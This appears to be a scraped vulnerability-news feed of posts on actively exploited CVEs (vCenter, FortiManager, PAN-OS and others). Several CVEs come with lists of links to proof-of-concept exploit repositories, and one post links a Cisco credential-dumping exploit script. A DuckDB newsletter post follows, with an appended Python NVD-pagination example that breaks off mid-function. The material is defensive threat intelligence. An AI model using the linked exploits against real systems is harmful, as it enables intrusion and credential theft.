Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
##And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
##Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
VMSA-2024-0019: Questions & Answers https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md @vmwaresrc
More: Critical RCE bug in VMware vCenter Server now exploited in attacks https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/ @BleepingComputer @serghei #cybersecurity #infosec
##@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
THE HITS JUST KEEP COMING
##updated 2024-09-30T13:35:28
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-09-20T22:07:52
1 posts
1 repos
🚨CVE-2024-47062 PoC; SQL Injection Vulnerability in Navidrome
##updated 2024-09-16T15:29:27
1 posts
1 repos
Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight https://workos.com/blog/ruby-saml-cve-2024-45409
##updated 2024-09-09T18:30:30
1 posts
2 repos
Sophos News: VEEAM exploit seen used again with a new ransomware: "Frag"
Sophos X-Ops observed threat activity cluster "STAC 5881" exploiting CVE-2024-40711 to deploy a new ransomware called Frag. They previously deployed Fog or Akira ransomware. No indicators shared.
Reference: CVE-2024-40711 (9.8 critical, disclosed 04 September 2024 by Veeam, has Proof of Concept and vulnerability details, added to CISA KEV Catalog 17 October 2024) Veeam Backup and Replication Deserialization Vulnerability
#akira #fog #ransomware #stac5881 #cybercrime #CVE_2024_40711 #veeam #threatintel #cyberthreatintelligence #cybersecurity #infosec #CTI
##updated 2024-09-03T03:30:40
2 posts
1 repos
Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.
#Helldown #ransomware #cybercrime #CVE_2024_42057 #zyxel #vulnerability #malwareanalysis #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence
##updated 2024-08-27T18:31:36
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-08-01T15:33:03
1 posts
1 repos
@valorin I found this one a pretty good summary: https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.
##updated 2024-07-24T18:32:16
1 posts
26 repos
https://github.com/SyFi/cve-2017-0199
https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0
https://github.com/bhdresh/CVE-2017-0199
https://github.com/SwordSheath/CVE-2017-8570
https://github.com/ryhanson/CVE-2017-0199
https://github.com/jacobsoo/RTF-Cleaner
https://github.com/joke998/Cve-2017-0199-
https://github.com/kash-123/CVE-2017-0199
https://github.com/kn0wm4d/htattack
https://github.com/Sunqiz/CVE-2017-0199-reprofuction
https://github.com/BRAINIAC22/CVE-2017-0199
https://github.com/Winter3un/cve_2017_0199
https://github.com/n1shant-sinha/CVE-2017-0199
https://github.com/joke998/Cve-2017-0199
https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199
https://github.com/viethdgit/CVE-2017-0199
https://github.com/haibara3839/CVE-2017-0199-master
https://github.com/Phantomlancer123/CVE-2017-0199
https://github.com/NotAwful/CVE-2017-0199-Fix
https://github.com/mzakyz666/PoC-CVE-2017-0199
https://github.com/Exploit-install/CVE-2017-0199
https://github.com/nicpenning/RTF-Cleaner
https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-
https://github.com/likekabin/CVE-2017-0199
Fortinet: New Campaign Uses Remcos RAT to Exploit Victims
A phishing campaign is exploiting CVE-2017-0199 (7.8 high) Microsoft Office and WordPad Remote Code Execution Vulnerability to spread Remcos RAT. Indicators of compromise provided.
#remcosRAT #CVE_2017_0199 #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence #cti
##updated 2024-06-21T21:35:02
1 posts
1 repos
🚨CVE-2024-4577 RCE Exploit; PHP CGI Argument Injection
https://darkwebinformer.com/cve-2024-4577-rce-exploit-php-cgi-argument-injection/
##updated 2024-06-20T18:35:10
2 posts
2 repos
🚨CVE-2024-35250 PoC for the Untrusted Pointer Dereference in the ks.sys driver
##updated 2024-06-11T18:30:56
1 posts
DEF CON 32 – Outlook Unleashing RCE Chaos CVE 2024 30103 – Source: securityboulevard.com https://ciso2ciso.com/def-con-32-outlook-unleashing-rce-chaos-cve-2024-30103-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #cybersecurityeducation #InfosecurityEducation #CyberSecurityNews #SecurityBoulevard #DEFCONConference #DEFCON32
##updated 2024-05-16T21:31:58
1 posts
1 repos
Windows DWM Core Library Elevation of Privilege Vulnerability (CVE-2024-30051) https://www.coresecurity.com/core-labs/articles/windows-dwm-core-library-elevation-privilege-vulnerability-cve-2024-30051
##updated 2024-05-16T12:30:29
1 posts
1 repos
ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability
ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.
#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT
##updated 2024-04-29T05:02:31
1 posts
1 repos
@krypt3ia No kidding. The impact hasn't been as bad, but the communication is so much worse than even the CVE-2024-3400 shitshow. Definitely feels like something's up. Like someone else is using the same vuln and doesn't want access to get burned yet, IDK.
##updated 2024-04-11T21:19:47
1 posts
New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##updated 2024-04-09T18:30:35
2 posts
1 repos
@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄
##updated 2024-04-04T06:17:12
1 posts
15 repos
https://github.com/fox-it/citrix-netscaler-triage
https://github.com/BishopFox/CVE-2023-3519
https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519
https://github.com/Mohammaddvd/CVE-2023-3519
https://github.com/SalehLardhi/CVE-2023-3519
https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck
https://github.com/passwa11/CVE-2023-3519
https://github.com/getdrive/PoC
https://github.com/securekomodo/citrixInspector
https://github.com/mr-r3b00t/CVE-2023-3519
https://github.com/rwincey/cve-2023-3519
https://github.com/Chocapikk/CVE-2023-3519
https://github.com/d0rb/CVE-2023-3519
https://github.com/telekom-security/cve-2023-3519-citrix-scanner
Surge in exploits of zero-day vulnerabilities is ‘new normal’ warns Five Eyes alliance
In a co-authored advisory, the agencies list the top 15 most routinely exploited vulnerabilities of 2023, with CVE-2023-3519 — an issue affecting...
🔗️ [Therecord] https://link.is.it/t2ct9p
##updated 2024-04-04T05:08:19
1 posts
New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##updated 2024-04-04T04:45:33
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-03-18T12:31:54
2 posts
4 repos
https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
https://github.com/m-cetin/CVE-2024-20767
Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##updated 2024-03-07T18:30:26
1 posts
1 repos
So AIX 7.2 and 7.3 are vulnerable to CVE-2023-36328 in tcl, a CVSSv3 9.8 RCE per IBM that was initially published over a year ago, and the bulletin didn't come out from IBM until last week? https://www.ibm.com/support/pages/security-bulletin-aix-vulnerable-arbitrary-code-execution-cve-2023-36328-due-tcl
##updated 2024-03-02T05:06:50
1 posts
1 repos
CVE-2023-4911 – Looney Tunables ( https://nfsec.pl/security/6542 ) #linux #glibc #security #twittermigration
##updated 2024-02-21T18:31:06
4 posts
2 repos
CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog
CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).
🔗️ [Cyble] https://link.is.it/so5jib
###CISA has updated the KEV catalogue:
- CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1212
- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-0012
- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-9474 @cisacyber #cybersecurity #infosec #PaloAlto
##CVE ID: CVE-2024-1212
Vendor: Progress
Product: Kemp LoadMaster
Date Added: 2024-11-18
Vulnerability: Progress Kemp LoadMaster OS Command Injection Vulnerability
Notes: https://community.progress.com/s/article/Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1212
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1212
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##updated 2024-02-15T15:30:37
5 posts
1 repos
What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##lol, at this point you should just throw your fortinet devices into a landfill. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ #cybersecurity #infosec #Fortinet
##watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability
watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system could be easily bypassed, and exploitation could occur without generating any log noise at all.
#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-02-03T05:07:29
2 posts
1 repos
Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##updated 2024-02-03T05:06:23
2 posts
1 repos
Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##updated 2023-08-16T18:30:19
1 posts
Also being sprayed - dumps memory on AnyConnect including creds https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
##updated 2023-08-08T15:31:21
4 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2023-06-05T05:00:42
1 posts
9 repos
https://github.com/gassara-kys/CVE-2021-40438
https://github.com/xiaojiangxl/CVE-2021-40438
https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit
https://github.com/cyberark/PwnKit-Hunter
https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt
https://github.com/Cappricio-Securities/CVE-2021-40438
https://github.com/Kashkovsky/CVE-2021-40438
CVE-2021-4043 (5.5 medium) Motion Spell GPAC Null Pointer Dereference Vulnerability is no longer on the KEV Catalog.
##updated 2023-03-23T18:30:31
1 posts
15 repos
https://github.com/darkerego/Nostromo_Python3
https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE
https://github.com/ianxtianxt/CVE-2019-16278
https://github.com/cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE
https://github.com/jas502n/CVE-2019-16278
https://github.com/NHPT/CVE-2019-16278
https://github.com/n3rdh4x0r/CVE-2019-16278
https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE
https://github.com/sunnet-cyber/CVE2019_16278
https://github.com/imjdl/CVE-2019-16278-PoC
https://github.com/alexander-fernandes/CVE-2019-16278
https://github.com/Kr0ff/cve-2019-16278
https://github.com/keshiba/cve-2019-16278
We (GreyNoise) have coverage for 3 of the 4 CVEs in today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2023-02-02T05:01:14
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2023-02-01T05:06:42
4 posts
1 repos
##updated 2023-01-27T05:02:50
1 posts
Please don't "fix" bzip2 CVE-2019-12900
https://inbox.sourceware.org/bzip2-devel/20241108214034.GC8315@gnu.wildebeest.org/
##updated 2023-01-27T05:02:29
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with data science/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):

```sql
INSTALL gsheets FROM community;
LOAD gsheets;
```
Basic usage patterns include:
```sql
-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');
-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
```
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
```sql
LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);
```
And, now we can look at the “schema”:
```shell
$ duckdb -json -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet = 'Sheet1'
) LIMIT 1" | jq
```

```json
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]
```
And, perform normal ops on it:
```shell
$ duckdb -table -c "
LOAD gsheets;
FROM read_gsheet(
  'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
  sheet = 'Sheet1'
)
SELECT Vendor, COUNT(Vendor) AS ct
GROUP BY Vendor
ORDER BY 2 DESC"
```

```
+---------------------+----+
| Vendor              | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               |  9 |
| NETGEAR             |  8 |
| Juniper             |  6 |
| F5                  |  6 |
| PANW                |  5 |
| Sophos              |  5 |
| DrayTek             |  3 |
| Tenda               |  3 |
| TP-Link             |  2 |
| MikroTik            |  2 |
| Dasan               |  2 |
| Check Point         |  1 |
| D-Link and TRENDnet |  1 |
| Barracuda           |  1 |
| Netis               |  1 |
| FatPipe             |  1 |
| Arcadyan            |  1 |
| Sumavision          |  1 |
+---------------------+----+
```
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces: a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
```sql
INSTALL http_client FROM community;
LOAD http_client;
```
The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility: its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
```sql
CREATE TABLE yesterday AS (
  WITH __req AS (
    SELECT http_get(
      'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
    ) AS res
  ),
  __res AS (
    SELECT UNNEST(
      from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]')
    ) AS cves
    FROM __req
  )
  FROM __res
);
```
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that; you can work around it by combining this method with some shell scripting.
What that query returns is an array of deeply nested JSON records:
```sql
FROM yesterday LIMIT 3;
```

```
┌─────────────────────────────────────────────────────────────────────────────┐
│                                    cves                                     │
│                                    json                                     │
├─────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │
└─────────────────────────────────────────────────────────────────────────────┘
```
But DuckDB lets us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all its worth:
```sql
FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
```

```
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘
```
You can add headers, and use getenv(var) to fill in things like API keys.
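The pagination caveat above and the vulnStatus roll-up, as an added Python example that is not from the Drop or from the http_client extension: it walks the NVD CVE API 2.0 `startIndex`/`resultsPerPage`/`totalResults` fields until a day's records are exhausted (the API caps a page at 2,000), then tallies `cve.vulnStatus` the way the DuckDB query does. The fetcher is injected so the constructed sample runs offline; the real fetcher reads a key from an `NVD_API_KEY` environment variable (that variable name is an assumption of this example; `apiKey` is the request header NVD documents) and the `CVE-0000-*` ids in the sample are placeholders, not real records.

```python
import json
import os
from typing import Callable, Dict, List
from urllib.parse import parse_qs, urlencode, urlparse
from urllib.request import Request, urlopen

NVD_BASE = "https://services.nvd.nist.gov/rest/json/cves/2.0/"
PAGE_SIZE = 2000  # NVD caps resultsPerPage at 2,000, hence the loop below

Fetcher = Callable[[str], dict]


def build_url(pub_start: str, pub_end: str, start_index: int,
              page_size: int = PAGE_SIZE) -> str:
    """Compose one page request for the pubStartDate/pubEndDate window."""
    params = {
        "pubStartDate": pub_start,
        "pubEndDate": pub_end,
        "startIndex": start_index,
        "resultsPerPage": page_size,
    }
    return NVD_BASE + "?" + urlencode(params)


def http_fetch(url: str) -> dict:
    """Real fetcher. NVD takes the key in the 'apiKey' header; the
    NVD_API_KEY variable name is an assumption of this example."""
    headers = {"User-Agent": "nvd-paginate-example"}
    api_key = os.environ.get("NVD_API_KEY")
    if api_key:
        headers["apiKey"] = api_key
    with urlopen(Request(url, headers=headers), timeout=60) as resp:
        return json.loads(resp.read().decode("utf-8"))


def fetch_all(pub_start: str, pub_end: str, fetch: Fetcher = http_fetch,
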